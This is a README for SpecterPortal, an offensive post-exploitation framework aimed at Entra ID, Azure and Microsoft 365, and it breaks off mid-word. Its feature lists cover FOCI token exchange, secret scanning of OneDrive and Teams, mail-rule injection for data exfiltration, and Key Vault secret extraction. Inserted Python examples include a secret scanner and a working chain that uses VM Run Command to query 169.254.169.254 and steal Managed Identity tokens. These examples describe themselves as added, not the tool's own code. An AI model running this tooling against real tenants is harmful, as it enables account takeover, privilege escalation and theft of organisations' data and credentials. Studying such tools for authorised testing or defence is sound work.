SpecterPortal
<img width="1536" height="1024" alt="SpecterPortal logo" src="https://github.com/user-attachments/assets/04d48310-f803-4662-8625-648703a1c38e" />
<div align="center">Security Platform for Entra Cloud Token Enumeration & Reconnaissance
[#] by r3alm0m1x82 - safebreach.it [#]
Features • Installation • Authentication • Roadmap
</div>
Overview
SpecterPortal is an advanced post-exploitation framework designed for Red Team operations in Entra ID, Azure and Microsoft 365 environments. Unlike basic enumeration tools, SpecterPortal provides a complete offensive platform with token management, deep content analysis, resource abuse capabilities, and privilege escalation vectors.
What makes SpecterPortal unique:
- FOCI token exchange across 36 Microsoft applications
- Permission-less Conditional Access Policy extraction
- Deep OneDrive/Teams secret scanning with pattern detection
- Azure Resource abuse (VM command execution, Managed Identity extraction, etc.)
- Complete M365 operations (Email, Calendar, Teams, SharePoint, etc.)
- 130+ pre-loaded Application IDs for Device Code Flow
🎥 Watch SpecterBroker/SpecterPortal vs CrowdStrike: https://youtu.be/Gk7cB2Tl8Qo
⚠️ Disclaimer
IMPORTANT - READ CAREFULLY
This tool is provided for educational and authorized security testing purposes only.
Legal Notice
- ✅ Authorized Use Only: Use only on systems you own or have explicit written permission to test.
- ❌ Unauthorized Access: Using this tool without proper authorization may violate the laws of your country.
Key Features
Token Management & Authentication
<img width="2492" height="1016" alt="image" src="https://github.com/user-attachments/assets/cc2cf174-a368-4b84-8b76-1baa8b41bda8" />
Advanced Token Operations:
- FOCI Token Exchange: Generate tokens for 36 FOCI-enabled applications from a single Refresh Token
- Multi-Audience Generation: Create Access Tokens for Graph, ARM, KeyVault, Storage, legacy AzureAD
- Auto-Refresh Scheduler: Background service monitors and refreshes expiring tokens (configurable 5-30 min)
- Smart Deduplication: Prevents duplicate token imports via cache tracking
- NGC Token Support: Infrastructure ready for Windows Hello credentials (upcoming)
Authentication Methods:
- Device Code Flow with 130+ pre-configured Microsoft Application IDs
- ROPC (Resource Owner Password Credentials, username/password grant) for probing scenarios where Conditional Access does not enforce MFA for the targeted user and app (the grant fails with interaction_required when it does)
- Client Secret authentication for Service Principals
- Manual token import (TBRes cache, WAM Broker, raw JWT)
- SpecterBroker integration for Windows token extraction
Token Analysis:
- JWT decoding with claims visualization
- Scope and permission analysis
- Directory role detection (including Administrative Units)
- Microsoft 365 license identification
- FOCI family classification
- Expiration tracking with alerts
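The token analysis listed above (claims, scopes, directory roles, FOCI family, expiry) comes down to base64url-decoding the JWT payload and mapping a few claims against known identifiers. The following is an added example, not SpecterPortal's own code: it inspects a locally constructed, unsigned sample token, and deliberately never checks a signature, since the goal is to understand a token you already hold rather than to trust one you received. The role template IDs and FOCI client IDs are taken from Microsoft's published role list and public FOCI research; verify them against the current lists before relying on them.

```python
"""Inspect an Entra ID access token: decode its payload and map the claims a
token manager cares about (audience, scopes, app roles, directory roles, FOCI
family, expiry). Added example, not SpecterPortal code. Nothing here verifies
the signature: the point is to understand a token you already hold."""
import base64
import json
import time
from typing import Optional

# Role template IDs from Microsoft's published built-in role list (verify
# against the current list). Only tenant-scoped active roles show up in
# `wids`; roles scoped to an Administrative Unit do not, so an empty `wids`
# is not proof that the account is unprivileged.
ROLE_TEMPLATES = {
    "62e90394-69f5-4237-9190-012177145e10": "Global Administrator",
    "e8611ab8-c189-46e8-94e1-60213ab1f814": "Privileged Role Administrator",
    "9b895d92-2cd3-44c7-9d02-a6ac2d5ea5c3": "Application Administrator",
    "fe930be7-5e62-47db-91af-98c3a49a38b1": "User Administrator",
    "29232cdf-9323-42fd-ade2-1d097af3e4de": "Exchange Administrator",
    "f28a1f50-f6e7-4571-818b-6a12f2af6b6c": "SharePoint Administrator",
    "f2ef992c-3afb-46b9-b7cf-a126ee74c451": "Global Reader",
}

# Public FOCI (Family of Client IDs) members, from public research. A refresh
# token issued to any of these can be redeemed for access tokens of the others.
FOCI_CLIENTS = {
    "d3590ed6-52b3-4102-aeff-aad2292ab01c": "Microsoft Office",
    "1fec8e78-bce4-4aaf-ab1b-5451cc387264": "Microsoft Teams",
    "04b07795-8ddb-461a-bbee-02f9e1bf7b46": "Microsoft Azure CLI",
    "1950a258-227b-4e31-a9cf-717495945fc2": "Microsoft Azure PowerShell",
    "27922004-5251-4030-b22d-91ecd9a37ea4": "Outlook Mobile",
    "4813382a-8fa7-425e-ab75-3b753aab3abb": "Microsoft Authenticator App",
    "ab9b8c07-8f02-4f72-87fa-80105867a763": "OneDrive SyncEngine",
}


def _b64url_decode(segment: str) -> bytes:
    """JWT segments are base64url without padding; restore it before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt(token: str):
    """Return (header, payload) of a compact JWS. No signature check, by design."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected header.payload.signature")
    return json.loads(_b64url_decode(parts[0])), json.loads(_b64url_decode(parts[1]))


def analyze_token(token: str, now: Optional[float] = None, warn_seconds: int = 600) -> dict:
    _, c = decode_jwt(token)
    now = time.time() if now is None else now
    appid = c.get("appid") or c.get("azp")      # v1 tokens carry appid, v2 tokens azp
    scopes = c.get("scp", "").split()           # delegated permissions, space separated
    remaining = int(c.get("exp", 0) - now)
    return {
        "tenant": c.get("tid"),
        "subject": c.get("upn") or c.get("preferred_username") or c.get("sub"),
        "audience": c.get("aud"),
        "client_id": appid,
        "foci_app": FOCI_CLIENTS.get(appid),    # None => not a known FOCI member
        # Heuristic: scp present => delegated (user) token; roles only => app-only.
        "token_type": "delegated" if scopes else "application",
        "scopes": scopes,
        "app_roles": c.get("roles", []),
        "directory_roles": [ROLE_TEMPLATES.get(w, "unknown:" + w) for w in c.get("wids", [])],
        "expires_in_s": remaining,
        "expiring_soon": remaining < warn_seconds,   # what an auto-refresh scheduler keys on
    }


def _b64url(obj: dict) -> str:
    raw = json.dumps(obj, separators=(",", ":")).encode()
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


# Constructed sample token (fake tenant, fake user, dummy signature) for the demo.
SAMPLE_EXP = 1_800_000_000
SAMPLE_TOKEN = ".".join([
    _b64url({"typ": "JWT", "alg": "RS256", "kid": "example-kid"}),
    _b64url({
        "aud": "https://graph.microsoft.com",
        "iss": "https://sts.windows.net/11111111-2222-3333-4444-555555555555/",
        "tid": "11111111-2222-3333-4444-555555555555",
        "upn": "alice@contoso.example",
        "appid": "04b07795-8ddb-461a-bbee-02f9e1bf7b46",
        "scp": "User.Read Mail.Read Files.ReadWrite.All",
        "wids": ["62e90394-69f5-4237-9190-012177145e10"],
        "exp": SAMPLE_EXP,
    }),
    "c2lnbmF0dXJl",   # placeholder, not a real signature
])

if __name__ == "__main__":
    print(json.dumps(analyze_token(SAMPLE_TOKEN, now=SAMPLE_EXP - 300), indent=2))
```

Run it directly to see the analysis of the sample token; point `analyze_token` at a real token string to inspect one you have imported. Remember the caveat in the comments: a token with an empty `wids` can still belong to an account holding Administrative-Unit-scoped roles, which is why the directory enumeration later in this README queries role assignments rather than trusting the token alone.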
Search & Pattern Detection
<img width="1586" height="762" alt="image" src="https://github.com/user-attachments/assets/0222e68c-e450-4e1e-b383-cffbcaf2cdc4" />
Microsoft Search Integration:
- Cross-platform search: OneDrive, SharePoint, Emails
- Advanced filtering by sender, recipient, subject, dates
- Attachment enumeration and bulk download
OneDrive Deep Scanner:
- Recursive file content analysis (not just metadata)
- Pattern detection: AWS keys, Azure secrets, API tokens, passwords, certificates
- Supported formats: TXT, JSON, XML, CSV, YAML, ENV, CONFIG, LOG
- Severity classification (HIGH/MEDIUM/LOW)
- Export findings with context and file paths
Teams Secrets Scanner:
- Message content analysis across conversations and channels
- Credential pattern detection: API keys, tokens, connection strings
- Both Graph API and Skype API support for comprehensive coverage
- Conversation metadata with participant tracking
- Image and attachment support
Custom Patterns:
- Configurable regex patterns for organization-specific secrets
- Built-in template library
- Match highlighting and context extraction
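A content scanner of the kind described in this section is a set of regex patterns, each carrying a severity, run line by line over downloaded file contents or Teams message bodies, with the surrounding line kept as context for every hit. The block below is an added example and not SpecterPortal's scanner: the patterns, severities, extension filter and sample drive contents are constructed for the demo. The same `scan_text` function serves both the OneDrive and the Teams case, since a message body is just another string.

```python
"""Regex-driven secret scanner for OneDrive / Teams content sweeps: built-in
patterns with a severity, line-level context for each hit, an extension filter
for the file formats worth reading, and a hook for organisation-specific
patterns. Added example, not SpecterPortal's scanner; patterns, severities and
sample files below are constructed for this demo."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class Pattern:
    name: str
    regex: re.Pattern
    severity: str  # HIGH / MEDIUM / LOW


BUILTIN_PATTERNS: List[Pattern] = [
    Pattern("aws_access_key_id", re.compile(r"\bAKIA[0-9A-Z]{16}\b"), "HIGH"),
    # Azure storage account keys are 64 random bytes, base64 => 86 chars + "=="
    Pattern("azure_storage_key", re.compile(r"AccountKey=([A-Za-z0-9+/]{86}==)"), "HIGH"),
    Pattern("private_key_block", re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"), "HIGH"),
    Pattern("client_secret", re.compile(r"(?i)client_?secret[\"']?\s*[=:]\s*[\"']?([^\s\"',]{8,})"), "HIGH"),
    Pattern("password_assignment", re.compile(r"(?i)(?:passw(?:or)?d|pwd)\s*[=:]\s*[\"']?([^\s\"']{6,})"), "MEDIUM"),
    Pattern("generic_api_key", re.compile(r"(?i)api[_-]?key\s*[=:]\s*[\"']?([A-Za-z0-9_\-]{16,})"), "MEDIUM"),
    Pattern("internal_hostname", re.compile(r"\b[a-z0-9-]+\.(?:corp|internal|local)\b"), "LOW"),
]

# Organisation-specific additions; CVPN-... is a hypothetical token format for the demo.
# Pass BUILTIN_PATTERNS + CUSTOM_PATTERNS to run both sets in one sweep.
CUSTOM_PATTERNS: List[Pattern] = [
    Pattern("contoso_vpn_token", re.compile(r"\bCVPN-[0-9A-F]{12}\b"), "HIGH"),
]

# Text formats worth reading as-is; binaries and Office documents need a
# separate text-extraction step and are skipped here.
SCANNABLE_EXT = {".txt", ".json", ".xml", ".csv", ".yaml", ".yml", ".env", ".config", ".log"}


@dataclass
class Finding:
    path: str
    pattern: str
    severity: str
    line_no: int
    match: str
    context: str


def scan_text(path: str, text: str, patterns: Optional[List[Pattern]] = None) -> List[Finding]:
    """Scan one body of text (a file, or a Teams message) line by line."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for p in patterns or BUILTIN_PATTERNS:
            for m in p.regex.finditer(line):
                secret = m.group(1) if m.groups() else m.group(0)   # capture group = the secret itself
                findings.append(Finding(path, p.name, p.severity, line_no, secret, line.strip()[:160]))
    return findings


def scan_files(files: Dict[str, str], patterns: Optional[List[Pattern]] = None) -> List[Finding]:
    """`files` maps a drive path to its already-downloaded content."""
    out = []
    for path, text in files.items():
        if any(path.lower().endswith(ext) for ext in SCANNABLE_EXT):
            out.extend(scan_text(path, text, patterns))
    return out


def summarize(findings: List[Finding]) -> Dict[str, int]:
    counts = {"HIGH": 0, "MEDIUM": 0, "LOW": 0}
    for f in findings:
        counts[f.severity] += 1
    return counts


# Constructed sample drive contents. AKIAIOSFODNN7EXAMPLE is AWS's documented
# example key; the storage key and client secret are obvious dummies.
SAMPLE_FILES = {
    "Documents/deploy/.env": (
        "AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\n"
        "DB_PASSWORD=Winter2024!\n"
        "SQL_HOST=sql01.corp.internal\n"
    ),
    "Documents/deploy/appsettings.json": (
        '{"Storage": "DefaultEndpointsProtocol=https;AccountName=contosostore;'
        'AccountKey=' + "A" * 86 + '==;EndpointSuffix=core.windows.net", '
        '"ClientSecret": "Q~notARealSecretValue123"}\n'
    ),
    "Documents/notes/debug.log": "2024-05-01 12:00:01 INFO api_key=AbCdEf0123456789XyZ used for sync\n",
    "Pictures/team.png": "\x89PNG not text",
}

if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print(f"[{f.severity}] {f.path}:{f.line_no} {f.pattern} -> {f.match}")
    print(summarize(scan_files(SAMPLE_FILES)))
```

The severity is a property of the pattern, not of the match, which keeps triage predictable: a cloud key or private key block is HIGH regardless of where it sits, a bare hostname is LOW. Findings carry the path, line number and the trimmed line, which is what an export with context needs.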
Microsoft 365 Operations
Email Management: <img width="2482" height="1006" alt="image" src="https://github.com/user-attachments/assets/1e694e74-0d8b-4c4c-a1ca-d007cf52516e" />
- Full folder access (Inbox, Sent, Drafts, Deleted, Junk, Custom)
- HTML email composition with rich formatting
- Reply/Forward with message threading
- Attachment handling (upload/download)
- Malicious Rule Injection: Auto-forwarding, keyword monitoring, data exfiltration
Calendar:
- Event enumeration with attendee details
- Meeting information extraction
- Injected event tracking
- Calendar manipulation capabilities
OneDrive: <img width="2517" height="908" alt="image" src="https://github.com/user-attachments/assets/77a5eecd-cfac-42e7-a941-771996e29c27" />
- Complete file/folder hierarchy navigation
- Upload, download, rename, delete, move operations
- Batch download with ZIP compression
- Shared file enumeration
- Permission analysis
SharePoint: <img width="2483" height="941" alt="image" src="https://github.com/user-attachments/assets/51454bdd-97b4-49a9-8463-c30da063f186" />
- Site discovery and access
- Document library enumeration
- Advanced file search
- Content download with permission validation
Teams: <img width="2182" height="924" alt="image" src="https://github.com/user-attachments/assets/3627a597-8e23-4f12-8b0a-1177671d3b28" />
- Channel and Team enumeration
- Message history retrieval (Graph + Skype APIs)
- Participant lists and presence
- Image/attachment rendering
- Private chat access
Entra ID Enumeration
Directory Intelligence: <img width="2493" height="996" alt="image" src="https://github.com/user-attachments/assets/e4ff7962-78a6-4131-8de7-290ded80e4bf" />
- Complete enumeration: Users, Groups, Devices, Contacts
- Guest account identification with external domain tracking
- On-premises sync status
- MFA status per user
- Owned Objects: User-owned apps, groups, devices
- CSV/JSON export capabilities
Application Analysis: <img width="2477" height="971" alt="image" src="https://github.com/user-attachments/assets/66d56a62-976e-4200-9d4c-e762a1c510e4" />
- App Registration enumeration with owners
- Service Principal analysis
- Managed Identity detection (System/User-assigned)
- OAuth consent grants tracking
- Permission scope analysis (Delegated vs Application)
- Client Secret & Certificate inventory with expiration tracking
- App role assignments
Privileged Access: <img width="2489" height="960" alt="image" src="https://github.com/user-attachments/assets/c42000ae-babb-452e-ba0a-14c1b3aad4b3" />
- Directory role enumeration with members
- Administrative Unit nested roles (not visible in JWT wids)
- Built-in vs custom role identification
- License tracking (E3, E5, F3, etc.)
Tenant Configuration: <img width="2484" height="1008" alt="image" src="https://github.com/user-attachments/assets/a0c9e096-080f-427e-ac02-5ce30e51335a" />
- Custom domain enumeration
- Authentication methods analysis
- Authorization Policy extraction (guest rules, default permissions)
- Security defaults status
Conditional Access Policies: <img width="2485" height="941" alt="image" src="https://github.com/user-attachments/assets/3d1fbf71-998a-40f6-9ba8-1c032507fff6" />
- Permission-less extraction using a legacy API technique
- Complete policy enumeration without the Policy.Read.All Graph permission normally required to read Conditional Access policies
- Policy conditions: users, groups, locations, platforms
- Grant and session controls analysis
- Policy state identification (Enabled/Disabled/Report-Only)
<img width="2495" height="807" alt="image" src="https://github.com/user-attachments/assets/1c516a27-3ef6-4fb4-8d8f-5a2836e4085e" />
Azure Resource Operations
Permission Analysis: <img width="1974" height="1011" alt="image" src="https://github.com/user-attachments/assets/0008d9ee-54ca-4144-9e87-7c13dfa4a602" />
- Role assignments per subscription (Owner, Contributor, Reader, custom)
- Resource group permissions
- Inherited vs direct assignments
- Deny assignments detection
- And more..
Virtual Machines: <img width="2196" height="335" alt="image" src="https://github.com/user-attachments/assets/16be7033-5b4d-4add-a8b8-d6364ebe740d" />
- VM inventory with status tracking
- Remote Command Execution via the Run Command API (requires Microsoft.Compute/virtualMachines/runCommand/action on the VM, e.g. Contributor or Virtual Machine Contributor; the script runs as root on Linux and SYSTEM on Windows)
- Managed Identity Token Extraction from the VM's Instance Metadata Service (169.254.169.254), available when a system- or user-assigned identity is attached to the VM
- Power operations: Start, Stop, Restart, Deallocate
- OS and configuration details
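Run Command and Managed Identity extraction are normally chained: the Run Command script executes inside the VM, where the Instance Metadata Service is reachable, and returns the identity token in its stdout. The following added example (not SpecterPortal code) builds the ARM request for both Linux and Windows guests and parses the result. It makes no network calls; the two result objects are constructed samples in the shape ARM returns, and that shape, with stdout and stderr folded into one `message` string, is assumed from the documented format.

```python
"""Run Command -> IMDS chain for pulling a Managed Identity token out of an
Azure VM. Added example, not SpecterPortal code: it builds the ARM call and
parses the result. No network calls are made; the two results below are
constructed in the shape ARM returns (assumed from the documented format).
Prerequisite: Microsoft.Compute/virtualMachines/runCommand/action on the VM."""
import json
import re
import urllib.parse
from typing import Optional

ARM = "https://management.azure.com"
IMDS = "http://169.254.169.254/metadata/identity/oauth2/token"


def imds_token_url(resource: str = "https://management.azure.com/") -> str:
    """IMDS identity endpoint. Callers must send the header `Metadata: true`,
    otherwise IMDS refuses the request. Change `resource` to target Graph,
    Key Vault or Storage instead of ARM."""
    return f"{IMDS}?api-version=2018-02-01&resource={urllib.parse.quote(resource, safe='')}"


def build_run_command(subscription: str, resource_group: str, vm: str,
                      resource: str = "https://management.azure.com/", linux: bool = True):
    """Return (url, json_body) for POST .../runCommand. The script runs as root
    (Linux) or SYSTEM (Windows); its output comes back in the poll result."""
    url = (f"{ARM}/subscriptions/{subscription}/resourceGroups/{resource_group}"
           f"/providers/Microsoft.Compute/virtualMachines/{vm}/runCommand?api-version=2023-03-01")
    if linux:
        body = {"commandId": "RunShellScript",
                "script": [f"curl -s -H 'Metadata: true' '{imds_token_url(resource)}'"]}
    else:
        body = {"commandId": "RunPowerShellScript",
                "script": [f"Invoke-RestMethod -Headers @{{Metadata='true'}} "
                           f"-Uri '{imds_token_url(resource)}' | ConvertTo-Json -Compress"]}
    return url, body


def extract_token(run_command_result: dict) -> Optional[dict]:
    """Run Command folds stdout and stderr into one `message` string:
    'Enable succeeded: <nl>[stdout]<nl><out><nl>[stderr]<nl><err>'. Pull the
    stdout part and parse the IMDS JSON. Returns None when the VM has no
    identity attached (IMDS answers with an error body) or the command failed."""
    for status in run_command_result.get("value", []):
        m = re.search(r"\[stdout\]\n(.*?)\n\[stderr\]", status.get("message", ""), re.S)
        if not m:
            continue
        try:
            data = json.loads(m.group(1).strip())
        except json.JSONDecodeError:
            continue
        if "access_token" in data:
            return data
    return None


def _arm_result(stdout: str, stderr: str = "") -> dict:
    """Build a Run Command result in the assumed ARM shape (for the samples)."""
    return {"value": [{"code": "ProvisioningState/succeeded", "level": "Info",
                       "displayStatus": "Provisioning succeeded",
                       "message": f"Enable succeeded: \n[stdout]\n{stdout}\n[stderr]\n{stderr}"}]}


# Constructed samples: a VM with an identity, and one where curl could not reach IMDS.
SUCCESS_RESULT = _arm_result(json.dumps({
    "access_token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.e30.c2ln",   # dummy, not a real token
    "client_id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee",
    "expires_in": "86399", "expires_on": "1800000000",
    "resource": "https://management.azure.com/", "token_type": "Bearer"}))
FAILED_RESULT = _arm_result("", "curl: (7) Failed to connect to 169.254.169.254 port 80")

if __name__ == "__main__":
    url, body = build_run_command("00000000-0000-0000-0000-000000000000", "rg-prod", "vm-web01")
    print(url)
    print(json.dumps(body))
    print(extract_token(SUCCESS_RESULT)["client_id"], extract_token(FAILED_RESULT))
```

Two operational points follow from the code: the ARM identity used to call Run Command only needs rights on the VM, while the token that comes back carries whatever RBAC the VM's Managed Identity has, which is the privilege escalation path; and Run Command executions are logged in the subscription Activity Log and leave an extension status on the VM, so this is not a quiet technique.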
Storage Accounts: <img width="1866" height="686" alt="image" src="https://github.com/user-attachments/assets/b12fd38e-3ee1-4202-9b40-8dc5f1766889" />
- Storage enumeration across subscriptions
- Firewall rule analysis (public vs restricted)
- Anonymous blob detection for data exposure
- Service configuration (Blob, File, Queue, Table)
- Access tier and replication settings
Key Vaults: <img width="1972" height="1015" alt="image" src="https://github.com/user-attachments/assets/148e03bb-6467-4673-a1ca-37aa75e2d58a" />
- Vault enumeration with access policies
- Secret extraction (with appropriate permissions)
- Certificate download with private keys
- Key metadata and operations
- Access policy analysis per identity
Automation Accounts: <img width="2520" height="946" alt="image" src="https://github.com/user-attachments/assets/1c91c707-2502-4aed-a091-6ea4ec611d8c" />
- Runbook enume